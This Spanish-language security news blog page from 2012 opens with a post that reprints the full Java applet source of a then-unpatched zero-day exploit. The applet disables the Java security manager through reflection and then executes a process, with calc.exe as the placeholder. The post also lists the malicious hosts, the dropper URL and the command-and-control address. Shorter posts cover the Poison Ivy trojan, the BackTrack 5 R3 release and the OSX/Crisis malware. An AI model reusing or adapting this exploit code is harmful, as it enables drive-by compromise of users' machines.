You are here: Home » None

Disponible el código fuente del nuevo 0-day de Java

by Esteban on August 28, 2012 0 Comments

Los investigadores de seguridad de FireEyehan informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.

Inicialmente se descubrio que este exploit estaba hospedado en ok.XXX4.net y actualmente este dominio está resolviendo una IP de China. La explotación de esta vulnerabilidad además descarga un ejecutable (Dropper.MsPMs) alojado en el mismo servidor (http://ok.XXX4.net/meeting/hi.exe). El dropper también conecta al C&C hello.icon.pk que actualmente resuelve con la IP 223.25.233.244 localizada en Singapur.

Se ha desarrollado un módulo de Metasploit que se ha probado con éxito en  Windows 7 SP1 parcheado con Java 7 Update 6, y en los siguientes entornos:

  •     Mozilla Firefox en Ubuntu Linux 10.04
  •     Internet Explorer / Mozilla Firefox / Chrome en Windows XP
  •     Internet Explorer / Mozilla Firefox en Windows Vista
  •     Internet Explorer / Mozilla Firefox en Windows 7
  •     Safari en OS X 10.7.4

Además el código fuente ya se encuentra disponible:

http://pastie.org/4594319

//
// CVE-2012-XXXX Java 0day
//
// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
// 
// secret host / ip : ok.aa24.net / 59.120.154.62
//
// regurgitated by jduck
//
// probably a metasploit module soon...
//
package cve2012xxxx;

import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class Gondvv extends Applet
{

    public Gondvv()
    {
    }

    public void disableSecurity()
        throws Throwable
    {
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }

    private Class GetClass(String paramString)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }

    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }

    public void init()
    {
        try
        {
            disableSecurity();
            Process localProcess = null;
            localProcess = Runtime.getRuntime().exec("calc.exe");
            if(localProcess != null);
               localProcess.waitFor();
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }

    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }
}


Hasta el momento Oracle no ha publicado ningún parche, por lo que se recomientda a los usuarios de Java desactivar el complemento de su navegador o desinstalar Java completamente del sistema.
 

Fuente: http://www.ehackingnews.com/2012/08/poc-source-code-for-new-0-day-java.html

Poison Ivy - Nuevo Trojan

by Esteban on August 27, 2012 0 Comments

Hace pocas horas se ha informado sobre un nuevo trojan conocido como Poison Ivy que explota una nueva vulnerabilidad en Java, en este momento no hay parche.

Se aconseja deshabilitar Java en nuestros navegadores hasta que se publique el parche o la forma de cómo solucionarlo manualmente.

Nueva version de Backtrack 5 disponible!

by Esteban on August 16, 2012 2 Comments

Ya está disponible la nueva versión de Backtrack 5 R3, la solución de seguridad y informática mas usada entre la comunidad por sus test de penetración.

 

Con la nueva versin se han corregido ciertos errores en el sistema, se han añadido sesenta nuevas herramientas, muchas de ellas presentadas  en los ultimos meses en las conferencias de seguridad  Black Hat 2012 y Defcon-20.

 

Esto se une a la ya muy completa lista de herramientas que  se ofrecía en el BackTrack 5 R2 incluyendo escáneres de puertos y vulnerabilidades, análisis forense, archivos de exploits, sniffer etc.

 

Backtrack 5 R3 esta disponible para descarga en el siguiente link:

 

http://www.backtrack-linux.org/downloads/

Nuevo Malware amenaza usuarios de Mac OS X.

by Esteban on August 14, 2012 0 Comments


Un reciente reporte de la empresa especialista en seguridad informática TreatMetrix Labs alertan sobre el nuevo trojan OSX/Crisis que estaría afectando a usuarios de Mac.
Todo indica a que este nuevo malware también conocido como OSX/Morcut-A es mucho mas sofisticado que los anteriores.


OSX/Morcut-A es una combinación entre backdoor y rootkit que se instala mediante una aplicación JAVA y que a su vez permitiría la conexión hacia un servidor que permitiría al atacante tener acceso remoto a su objetivo.


Según ThreatMetrix, este nuevo malware marca un antes y un después para la seguridad en el OSX, lo que hara a los usuarios de Apple crear consciencia de que tan protegidos están sus sistemas.


Ya Apple ha venido trabajando en incrementar la seguridad, prueba de ello es su nuevo sistema operativo OS X Mountain Lion, que viene con nuevas características en seguridad como Gatekeeper y aplicaciones como Sandbox y FileVault2.

Mas información del reporte de ThreatMetrix, esta disponible en el siguiente link: http://threatmetrix.com/threatmetrix-labs/threatmetrix-labs-reports/.

www.estebanrojas.com